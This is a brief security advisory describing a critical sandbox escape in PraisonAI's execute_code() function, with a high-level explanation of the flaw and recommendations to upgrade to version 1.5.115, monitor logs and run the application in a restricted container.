A critical sandbox escape vulnerability in PraisonAI allows attackers to bypass security layers and execute arbitrary code on the server.

The execute_code() function uses an insufficient AST-based blocklist for sandbox mode. Attackers can chain specific attributes to escape the sandbox, access internal Python built-ins, and achieve Remote Code Execution.

The ability to escape the sandbox environment allows an attacker to execute arbitrary commands with the privileges of the application. With a CVSS score of 9.9, this vulnerability presents an extreme risk to server integrity and data security.

Immediate Action: Upgrade PraisonAI to version 1.5.115 or later immediately.

Proactive Monitoring: Monitor for abnormal subprocess activity or attempts to access restricted Python built-ins within the application logs.

Compensating Controls: Run the application within a containerized environment with strict resource limits and read-only filesystems to minimize the impact of a potential escape.

Public Exploit Available: No

This is a high-severity sandbox escape that fundamentally undermines the security of the PraisonAI system. Immediate upgrade to the patched version is mandatory to ensure the integrity of the execution environment.